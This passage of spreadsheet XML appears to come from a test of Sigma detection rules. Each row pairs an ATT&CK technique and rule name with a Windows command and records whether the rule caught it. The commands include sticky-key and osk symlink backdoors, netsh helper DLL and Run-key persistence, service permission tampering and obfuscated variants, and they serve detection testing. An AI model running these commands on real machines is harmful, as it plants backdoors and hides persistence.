      <c r="D663" s="44" t="inlineStr">
        <is>
          <t>ae6f14e6-14de-45b0-9f44-c0986f50dc89</t>
        </is>
      </c>
      <c r="E663" s="44" t="inlineStr">
        <is>
          <t>cmd /c assoc .txt=exefile</t>
        </is>
      </c>
      <c r="F663" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G663" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H663" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I663" s="44" t="n"/>
      <c r="J663" s="44" t="n">
        <v>3</v>
      </c>
      <c r="K663" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="664" ht="15.75" customHeight="1" s="42">
      <c r="A664" s="44" t="inlineStr">
        <is>
          <t>t1546.008</t>
        </is>
      </c>
      <c r="B664" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_mklink_osk_cmd</t>
        </is>
      </c>
      <c r="C664" s="44" t="inlineStr">
        <is>
          <t>Potential Privilege Escalation Using Symlink Between Osk and Cmd</t>
        </is>
      </c>
      <c r="D664" s="44" t="inlineStr">
        <is>
          <t>e9b61244-893f-427c-b287-3e708f321c6b</t>
        </is>
      </c>
      <c r="E664" s="44" t="inlineStr">
        <is>
          <t>cmd /c "mklink C:\\Windows\\System32\\osk.exe C:\\Windows\\System32\\cmd.exe"</t>
        </is>
      </c>
      <c r="F664" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G664" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H664" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I664" s="44" t="n"/>
      <c r="J664" s="44" t="n">
        <v>3</v>
      </c>
      <c r="K664" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="665" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A665" s="44" t="inlineStr">
        <is>
          <t>t1546.008</t>
        </is>
      </c>
      <c r="B665" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_mklink_osk_cmd</t>
        </is>
      </c>
      <c r="C665" s="44" t="inlineStr">
        <is>
          <t>Potential Privilege Escalation Using Symlink Between Osk and Cmd</t>
        </is>
      </c>
      <c r="D665" s="44" t="inlineStr">
        <is>
          <t>e9b61244-893f-427c-b287-3e708f321c6b</t>
        </is>
      </c>
      <c r="E665" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "set a=mk; set b=link; %a%%b% C:\\Windows\\System32\\osk.exe C:\\Windows\\System32\\cmd.exe"</t>
        </is>
      </c>
      <c r="F665" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G665" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H665" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I665" s="44" t="n"/>
      <c r="J665" s="44" t="n">
        <v>3</v>
      </c>
      <c r="K665" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="666" ht="15.75" customHeight="1" s="42">
      <c r="A666" s="44" t="inlineStr">
        <is>
          <t>t1546.008</t>
        </is>
      </c>
      <c r="B666" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_mklink_osk_cmd</t>
        </is>
      </c>
      <c r="C666" s="44" t="inlineStr">
        <is>
          <t>Potential Privilege Escalation Using Symlink Between Osk and Cmd</t>
        </is>
      </c>
      <c r="D666" s="44" t="inlineStr">
        <is>
          <t>e9b61244-893f-427c-b287-3e708f321c6b</t>
        </is>
      </c>
      <c r="E666" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "mklink /D C:\\Windows\\System32\\osk.exe C:\\Windows\\System32\\cmd.exe"</t>
        </is>
      </c>
      <c r="F666" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G666" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H666" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I666" s="44" t="n"/>
      <c r="J666" s="44" t="n">
        <v>3</v>
      </c>
      <c r="K666" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="667" ht="15.75" customHeight="1" s="42">
      <c r="A667" s="44" t="inlineStr">
        <is>
          <t>t1546.008</t>
        </is>
      </c>
      <c r="B667" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_mklink_osk_cmd</t>
        </is>
      </c>
      <c r="C667" s="44" t="inlineStr">
        <is>
          <t>Potential Privilege Escalation Using Symlink Between Osk and Cmd</t>
        </is>
      </c>
      <c r="D667" s="44" t="inlineStr">
        <is>
          <t>e9b61244-893f-427c-b287-3e708f321c6b</t>
        </is>
      </c>
      <c r="E667" s="44" t="inlineStr">
        <is>
          <t>powershell -Command "New-Item -ItemType SymbolicLink -Path 'C:\\Windows\\System32\\osk.exe' -Target 'C:\\Windows\\System32\\cmd.exe' -Force"</t>
        </is>
      </c>
      <c r="F667" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G667" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H667" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I667" s="44" t="n"/>
      <c r="J667" s="44" t="n">
        <v>3</v>
      </c>
      <c r="K667" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="668" ht="15.75" customHeight="1" s="42">
      <c r="A668" s="44" t="inlineStr">
        <is>
          <t>t1546.008</t>
        </is>
      </c>
      <c r="B668" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_sticky_key_like_backdoor_execution</t>
        </is>
      </c>
      <c r="C668" s="44" t="inlineStr">
        <is>
          <t>Sticky Key Like Backdoor Execution</t>
        </is>
      </c>
      <c r="D668" s="44" t="inlineStr">
        <is>
          <t>2fdefcb3-dbda-401e-ae23-f0db027628bc</t>
        </is>
      </c>
      <c r="E668" s="44" t="inlineStr">
        <is>
          <t>cmd.exe ^"sethc.exe^"</t>
        </is>
      </c>
      <c r="F668" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G668" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H668" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I668" s="44" t="n"/>
      <c r="J668" s="44" t="n">
        <v>3</v>
      </c>
      <c r="K668" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="669" ht="15.75" customHeight="1" s="42">
      <c r="A669" s="44" t="inlineStr">
        <is>
          <t>t1546.008</t>
        </is>
      </c>
      <c r="B669" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_sticky_key_like_backdoor_execution</t>
        </is>
      </c>
      <c r="C669" s="44" t="inlineStr">
        <is>
          <t>Sticky Key Like Backdoor Execution</t>
        </is>
      </c>
      <c r="D669" s="44" t="inlineStr">
        <is>
          <t>2fdefcb3-dbda-401e-ae23-f0db027628bc</t>
        </is>
      </c>
      <c r="E669" s="44" t="inlineStr">
        <is>
          <t>cmd.exe sethc.exe</t>
        </is>
      </c>
      <c r="F669" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G669" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H669" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I669" s="44" t="n"/>
      <c r="J669" s="44" t="n">
        <v>3</v>
      </c>
      <c r="K669" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="670" ht="15.75" customHeight="1" s="42">
      <c r="A670" s="44" t="inlineStr">
        <is>
          <t>t1546.008</t>
        </is>
      </c>
      <c r="B670" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_sticky_key_like_backdoor_execution</t>
        </is>
      </c>
      <c r="C670" s="44" t="inlineStr">
        <is>
          <t>Sticky Key Like Backdoor Execution</t>
        </is>
      </c>
      <c r="D670" s="44" t="inlineStr">
        <is>
          <t>2fdefcb3-dbda-401e-ae23-f0db027628bc</t>
        </is>
      </c>
      <c r="E670" s="44" t="inlineStr">
        <is>
          <t>cmd.exe %VARIABLE% where VARIABLE=sethc.exe</t>
        </is>
      </c>
      <c r="F670" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G670" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H670" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I670" s="44" t="n"/>
      <c r="J670" s="44" t="n">
        <v>3</v>
      </c>
      <c r="K670" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="671" ht="15.75" customHeight="1" s="42">
      <c r="A671" s="44" t="inlineStr">
        <is>
          <t>t1505.004</t>
        </is>
      </c>
      <c r="B671" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_iis_susp_module_registration</t>
        </is>
      </c>
      <c r="C671" s="44" t="inlineStr">
        <is>
          <t>Suspicious IIS Module Registration</t>
        </is>
      </c>
      <c r="D671" s="44" t="inlineStr">
        <is>
          <t>043c4b8b-3a54-4780-9682-081cb6b8185c</t>
        </is>
      </c>
      <c r="E671" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "New-WebGlobalModule -Name 'SuspiciousModule' -Image 'module.dll'"</t>
        </is>
      </c>
      <c r="F671" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G671" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H671" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I671" s="44" t="n"/>
      <c r="J671" s="44" t="n">
        <v>3</v>
      </c>
      <c r="K671" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="672" ht="15.75" customHeight="1" s="42">
      <c r="A672" s="44" t="inlineStr">
        <is>
          <t>t1547</t>
        </is>
      </c>
      <c r="B672" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_susp_grpconv</t>
        </is>
      </c>
      <c r="C672" s="44" t="inlineStr">
        <is>
          <t>Suspicious GrpConv Execution</t>
        </is>
      </c>
      <c r="D672" s="44" t="inlineStr">
        <is>
          <t>f14e169e-9978-4c69-acb3-1cff8200bc36</t>
        </is>
      </c>
      <c r="E672" s="44" t="inlineStr">
        <is>
          <t>grpconv.exe -o</t>
        </is>
      </c>
      <c r="F672" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G672" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H672" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I672" s="44" t="n"/>
      <c r="J672" s="44" t="n">
        <v>3</v>
      </c>
      <c r="K672" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="673" ht="15.75" customHeight="1" s="42">
      <c r="A673" s="44" t="inlineStr">
        <is>
          <t>t1547</t>
        </is>
      </c>
      <c r="B673" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_susp_grpconv</t>
        </is>
      </c>
      <c r="C673" s="44" t="inlineStr">
        <is>
          <t>Suspicious GrpConv Execution</t>
        </is>
      </c>
      <c r="D673" s="44" t="inlineStr">
        <is>
          <t>f14e169e-9978-4c69-acb3-1cff8200bc36</t>
        </is>
      </c>
      <c r="E673" s="44" t="inlineStr">
        <is>
          <t>grpconv.exe --option=o</t>
        </is>
      </c>
      <c r="F673" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G673" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H673" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I673" s="44" t="n"/>
      <c r="J673" s="44" t="n">
        <v>3</v>
      </c>
      <c r="K673" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="674" ht="15.75" customHeight="1" s="42">
      <c r="A674" s="44" t="inlineStr">
        <is>
          <t>t1547</t>
        </is>
      </c>
      <c r="B674" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_susp_grpconv</t>
        </is>
      </c>
      <c r="C674" s="44" t="inlineStr">
        <is>
          <t>Suspicious GrpConv Execution</t>
        </is>
      </c>
      <c r="D674" s="44" t="inlineStr">
        <is>
          <t>f14e169e-9978-4c69-acb3-1cff8200bc36</t>
        </is>
      </c>
      <c r="E674" s="44" t="inlineStr">
        <is>
          <t>grpconv.exe -o"</t>
        </is>
      </c>
      <c r="F674" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G674" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H674" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I674" s="44" t="n"/>
      <c r="J674" s="44" t="n">
        <v>3</v>
      </c>
      <c r="K674" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="675" ht="15.75" customHeight="1" s="42">
      <c r="A675" s="44" t="inlineStr">
        <is>
          <t>t1547</t>
        </is>
      </c>
      <c r="B675" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_susp_grpconv</t>
        </is>
      </c>
      <c r="C675" s="44" t="inlineStr">
        <is>
          <t>Suspicious GrpConv Execution</t>
        </is>
      </c>
      <c r="D675" s="44" t="inlineStr">
        <is>
          <t>f14e169e-9978-4c69-acb3-1cff8200bc36</t>
        </is>
      </c>
      <c r="E675" s="44" t="inlineStr">
        <is>
          <t>grpconv.exe -o'\''</t>
        </is>
      </c>
      <c r="F675" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G675" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H675" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I675" s="44" t="n"/>
      <c r="J675" s="44" t="n">
        <v>3</v>
      </c>
      <c r="K675" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="676" ht="15.75" customHeight="1" s="42">
      <c r="A676" s="44" t="inlineStr">
        <is>
          <t>t1546.007</t>
        </is>
      </c>
      <c r="B676" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_helper_dll_persistence</t>
        </is>
      </c>
      <c r="C676" s="44" t="inlineStr">
        <is>
          <t>Potential Persistence Via Netsh Helper DLL</t>
        </is>
      </c>
      <c r="D676" s="44" t="inlineStr">
        <is>
          <t>56321594-9087-49d9-bf10-524fe8479452</t>
        </is>
      </c>
      <c r="E676" s="44" t="inlineStr">
        <is>
          <t>copy netsh.exe not_netsh.exe &amp;&amp; not_netsh.exe add helper evil.dll</t>
        </is>
      </c>
      <c r="F676" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G676" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H676" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I676" s="44" t="n"/>
      <c r="J676" s="44" t="n">
        <v>3</v>
      </c>
      <c r="K676" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="677" ht="15.75" customHeight="1" s="42">
      <c r="A677" s="44" t="inlineStr">
        <is>
          <t>t1543.003</t>
        </is>
      </c>
      <c r="B677" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_service_dacl_modification_set_service</t>
        </is>
      </c>
      <c r="C677" s="44" t="inlineStr">
        <is>
          <t>Suspicious Service DACL Modification Via Set-Service Cmdlet</t>
        </is>
      </c>
      <c r="D677" s="44" t="inlineStr">
        <is>
          <t>a95b9b42-1308-4735-a1af-abb1c5e6f5ac</t>
        </is>
      </c>
      <c r="E677" s="44" t="inlineStr">
        <is>
          <t>pwsh.exe -Command "Set-Service -Name 'SuspiciousService' -SecurityDescriptorSddl 'D;;DCLC;;;BA'" -WindowStyle Hidden</t>
        </is>
      </c>
      <c r="F677" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G677" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H677" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I677" s="44" t="n"/>
      <c r="J677" s="44" t="n">
        <v>3</v>
      </c>
      <c r="K677" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="678" ht="15.75" customHeight="1" s="42">
      <c r="A678" s="44" t="inlineStr">
        <is>
          <t>t1543.003</t>
        </is>
      </c>
      <c r="B678" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_service_dacl_modification_set_service</t>
        </is>
      </c>
      <c r="C678" s="44" t="inlineStr">
        <is>
          <t>Suspicious Service DACL Modification Via Set-Service Cmdlet</t>
        </is>
      </c>
      <c r="D678" s="44" t="inlineStr">
        <is>
          <t>a95b9b42-1308-4735-a1af-abb1c5e6f5ac</t>
        </is>
      </c>
      <c r="E678" s="44" t="inlineStr">
        <is>
          <t>pwsh.exe -Command "spsv -Name 'SuspiciousService' -Sec 'D;;DCLC;;;BA'"</t>
        </is>
      </c>
      <c r="F678" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G678" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H678" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I678" s="44" t="n"/>
      <c r="J678" s="44" t="n">
        <v>3</v>
      </c>
      <c r="K678" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="679" ht="15.75" customHeight="1" s="42">
      <c r="A679" s="44" t="inlineStr">
        <is>
          <t>t1543.003</t>
        </is>
      </c>
      <c r="B679" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_service_dacl_modification_set_service</t>
        </is>
      </c>
      <c r="C679" s="44" t="inlineStr">
        <is>
          <t>Suspicious Service DACL Modification Via Set-Service Cmdlet</t>
        </is>
      </c>
      <c r="D679" s="44" t="inlineStr">
        <is>
          <t>a95b9b42-1308-4735-a1af-abb1c5e6f5ac</t>
        </is>
      </c>
      <c r="E679" s="44" t="inlineStr">
        <is>
          <t>pwsh.exe -Command "Set-Service -Name 'SuspiciousService' -SecurityDescriptorSddl 'D;;DCLC;;;BA'" -Command ""</t>
        </is>
      </c>
      <c r="F679" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G679" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H679" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I679" s="44" t="n"/>
      <c r="J679" s="44" t="n">
        <v>3</v>
      </c>
      <c r="K679" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="680" ht="15.75" customHeight="1" s="42">
      <c r="A680" s="44" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B680" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_hide_services_via_set_service</t>
        </is>
      </c>
      <c r="C680" s="44" t="inlineStr">
        <is>
          <t>Abuse of Service Permissions to Hide Services Via Set-Service</t>
        </is>
      </c>
      <c r="D680" s="44" t="inlineStr">
        <is>
          <t>514e4c3a-c77d-4cde-a00f-046425e2301e</t>
        </is>
      </c>
      <c r="E680" s="44" t="inlineStr">
        <is>
          <t>pwsh.exe -Command "Set-Service -Name 'MyService' -sd 'DCLCWPDTSD'"</t>
        </is>
      </c>
      <c r="F680" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G680" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H680" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I680" s="44" t="n"/>
      <c r="J680" s="44" t="n">
        <v>3</v>
      </c>
      <c r="K680" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="681" ht="15.75" customHeight="1" s="42">
      <c r="A681" s="44" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B681" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_hide_services_via_set_service</t>
        </is>
      </c>
      <c r="C681" s="44" t="inlineStr">
        <is>
          <t>Abuse of Service Permissions to Hide Services Via Set-Service</t>
        </is>
      </c>
      <c r="D681" s="44" t="inlineStr">
        <is>
          <t>514e4c3a-c77d-4cde-a00f-046425e2301e</t>
        </is>
      </c>
      <c r="E681" s="44" t="inlineStr">
        <is>
          <t>pwsh.exe -Command "Set-Service -Name 'MyService' -SecurityDescriptorSddl (([char[]]'DSTDPWCLCD' | ForEach-Object { $_ }) -join '' -replace 'DSTDPWCLCD','DCLCWPDTSD')"</t>
        </is>
      </c>
      <c r="F681" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G681" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H681" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I681" s="44" t="n"/>
      <c r="J681" s="44" t="n">
        <v>3</v>
      </c>
      <c r="K681" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="682" ht="15.75" customHeight="1" s="42">
      <c r="A682" s="44" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B682" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_change_sevice_image_path_by_non_admin</t>
        </is>
      </c>
      <c r="C682" s="44" t="inlineStr">
        <is>
          <t>Possible Privilege Escalation via Weak Service Permissions</t>
        </is>
      </c>
      <c r="D682" s="44" t="inlineStr">
        <is>
          <t>d937b75f-a665-4480-88a5-2f20e9f9b22a</t>
        </is>
      </c>
      <c r="E682" s="44" t="inlineStr">
        <is>
          <t>"sc.exe" config WeakService BINPATH= "mal.exe"</t>
        </is>
      </c>
      <c r="F682" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G682" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H682" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I682" s="44" t="n"/>
      <c r="J682" s="44" t="n">
        <v>3</v>
      </c>
      <c r="K682" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="683" ht="15.75" customHeight="1" s="42">
      <c r="A683" s="44" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B683" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_sdset_modification</t>
        </is>
      </c>
      <c r="C683" s="44" t="inlineStr">
        <is>
          <t>Service Security Descriptor Tampering Via Sc.EXE</t>
        </is>
      </c>
      <c r="D683" s="44" t="inlineStr">
        <is>
          <t>98c5aeef-32d5-492f-b174-64a691896d25</t>
        </is>
      </c>
      <c r="E683" s="44" t="inlineStr">
        <is>
          <t>copy sc.exe update.exe &amp;&amp; update.exe sdset TargetService D:(D;;DCLCWPDTSD;;;IU)(A;;CCLCSWLOCRRC;;;AU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)</t>
        </is>
      </c>
      <c r="F683" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G683" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H683" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I683" s="44" t="n"/>
      <c r="J683" s="44" t="n">
        <v>3</v>
      </c>
      <c r="K683" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="684" ht="15.75" customHeight="1" s="42">
      <c r="A684" s="44" t="inlineStr">
        <is>
          <t>t1546.015</t>
        </is>
      </c>
      <c r="B684" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_registered_com_objects</t>
        </is>
      </c>
      <c r="C684" s="44" t="inlineStr">
        <is>
          <t>Rundll32 Registered COM Objects</t>
        </is>
      </c>
      <c r="D684" s="44" t="inlineStr">
        <is>
          <t>f1edd233-30b5-4823-9e6a-c4171b24d316</t>
        </is>
      </c>
      <c r="E684" s="44" t="inlineStr">
        <is>
          <t>"C:\Windows\System32\RUNDLL32.EXE" -localserver "{B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}"</t>
        </is>
      </c>
      <c r="F684" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G684" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H684" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I684" s="44" t="n"/>
      <c r="J684" s="44" t="n">
        <v>3</v>
      </c>
      <c r="K684" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="685" ht="15.75" customHeight="1" s="42">
      <c r="A685" s="44" t="inlineStr">
        <is>
          <t>t1546.015</t>
        </is>
      </c>
      <c r="B685" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_registered_com_objects</t>
        </is>
      </c>
      <c r="C685" s="44" t="inlineStr">
        <is>
          <t>Rundll32 Registered COM Objects</t>
        </is>
      </c>
      <c r="D685" s="44" t="inlineStr">
        <is>
          <t>f1edd233-30b5-4823-9e6a-c4171b24d316</t>
        </is>
      </c>
      <c r="E685" s="44" t="inlineStr">
        <is>
          <t>"C:\Windows\System32\RUNDLL32.EXE" -sta "{B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}"</t>
        </is>
      </c>
      <c r="F685" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G685" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H685" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I685" s="44" t="n"/>
      <c r="J685" s="44" t="n">
        <v>3</v>
      </c>
      <c r="K685" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="686" ht="15.75" customHeight="1" s="42">
      <c r="A686" s="44" t="inlineStr">
        <is>
          <t>t1547.001</t>
        </is>
      </c>
      <c r="B686" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_add_run_key</t>
        </is>
      </c>
      <c r="C686" s="44" t="inlineStr">
        <is>
          <t>Potential Persistence Attempt Via Run Keys Using Reg.EXE</t>
        </is>
      </c>
      <c r="D686" s="44" t="inlineStr">
        <is>
          <t>de587dce-915e-4218-aac4-835ca6af6f70</t>
        </is>
      </c>
      <c r="E686" s="44" t="inlineStr">
        <is>
          <t>reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Persistence" /t REG_SZ /d "payload.exe" /f</t>
        </is>
      </c>
      <c r="F686" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G686" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H686" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I686" s="44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686" s="44" t="n">
        <v>3</v>
      </c>
      <c r="K686" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="687" ht="15.75" customHeight="1" s="42">
      <c r="A687" s="44" t="inlineStr">
        <is>
          <t>t1505.003</t>
        </is>
      </c>
      <c r="B687" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_tool_recon</t>
        </is>
      </c>
      <c r="C687" s="44" t="inlineStr">
        <is>
          <t>Webshell Tool Reconnaissance Activity</t>
        </is>
      </c>
      <c r="D687" s="44" t="inlineStr">
        <is>
          <t>f64e5c19-879c-4bae-b471-6d84c8339677</t>
        </is>
      </c>
      <c r="E687" s="44" t="inlineStr">
        <is>
          <t>python -h</t>
        </is>
      </c>
      <c r="F687" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G687" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H687" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I687" s="4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J687" s="44" t="n">
        <v>3</v>
      </c>
      <c r="K687" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="688" ht="15.75" customHeight="1" s="42">
      <c r="A688" s="44" t="inlineStr">
        <is>
          <t>t1546.007</t>
        </is>
      </c>
      <c r="B688" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_helper_dll_persistence</t>
        </is>
      </c>
      <c r="C688" s="44" t="inlineStr">
        <is>
          <t>Potential Persistence Via Netsh Helper DLL</t>
        </is>
      </c>
      <c r="D688" s="44" t="inlineStr">
        <is>
          <t>56321594-9087-49d9-bf10-524fe8479452</t>
        </is>
      </c>
      <c r="E688" s="44" t="inlineStr">
        <is>
          <t>netsh.exe add helper "C:\AtomicRedTeam\atomics\T1546.007\bin\NetshHelper.dll"</t>
        </is>
      </c>
      <c r="F688" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G688" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H688" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I688" s="44" t="inlineStr">
        <is>
          <t>Potential Persistence Via Netsh Helper DLL (56321594-9087-49d9-bf10-524fe8479452)</t>
        </is>
      </c>
      <c r="J688" s="44" t="n">
        <v>3</v>
      </c>
      <c r="K688" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="689" ht="15.75" customHeight="1" s="42">
      <c r="A689" s="44" t="inlineStr">
        <is>
          <t>t1546.007</t>
        </is>
      </c>
      <c r="B689" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_helper_dll_persistence</t>
        </is>
      </c>
      <c r="C689" s="44" t="inlineStr">
        <is>
          <t>Potential Persistence Via Netsh Helper DLL</t>
        </is>
      </c>
      <c r="D689" s="44" t="inlineStr">
        <is>
          <t>56321594-9087-49d9-bf10-524fe8479452</t>
        </is>
      </c>
      <c r="E689" s="44" t="inlineStr">
        <is>
          <t>netsh.exe  add helper "C:\AtomicRedTeam\atomics\T1546.007\bin\NetshHelper.dll"</t>
        </is>
      </c>
      <c r="F689" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G689" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H689" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I689" s="44" t="inlineStr">
        <is>
          <t>Potential Persistence Via Netsh Helper DLL (56321594-9087-49d9-bf10-524fe8479452)</t>
        </is>
      </c>
      <c r="J689" s="44" t="n">
        <v>3</v>
      </c>
      <c r="K689" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="690" ht="15.75" customHeight="1" s="42">
      <c r="A690" s="44" t="inlineStr">
        <is>
          <t>t1546.007</t>
        </is>
      </c>
      <c r="B690" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_helper_dll_persistence</t>
        </is>
      </c>
      <c r="C690" s="44" t="inlineStr">
        <is>
          <t>Potential Persistence Via Netsh Helper DLL</t>
        </is>
      </c>
      <c r="D690" s="44" t="inlineStr">
        <is>
          <t>56321594-9087-49d9-bf10-524fe8479452</t>
        </is>
      </c>
      <c r="E690" s="44" t="inlineStr">
        <is>
          <t>netsh add	helper evil.dll</t>
        </is>
      </c>
      <c r="F690" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G690" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H690" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I690" s="44" t="inlineStr">
        <is>
          <t>Potential Persistence Via Netsh Helper DLL (56321594-9087-49d9-bf10-524fe8479452)</t>
        </is>
      </c>
      <c r="J690" s="44" t="n">
